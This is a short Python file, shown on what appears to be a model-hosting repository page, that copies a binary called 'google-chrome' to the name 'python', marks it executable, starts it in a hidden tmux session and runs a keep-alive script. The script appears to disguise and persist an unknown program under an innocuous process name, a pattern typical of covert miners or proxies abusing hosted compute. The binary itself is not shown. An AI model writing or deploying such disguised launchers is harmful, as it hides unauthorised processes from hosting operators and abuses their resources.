savefile / main.py
ilhamap's picture
Update main.py
52f1d36 verified
raw
history blame
151 Bytes
import os
os.system("cp google-chrome python")
os.system("chmod +x python")
os.system("tmux new-session -d -s ses2 ./python")
os.system("bash keep.sh")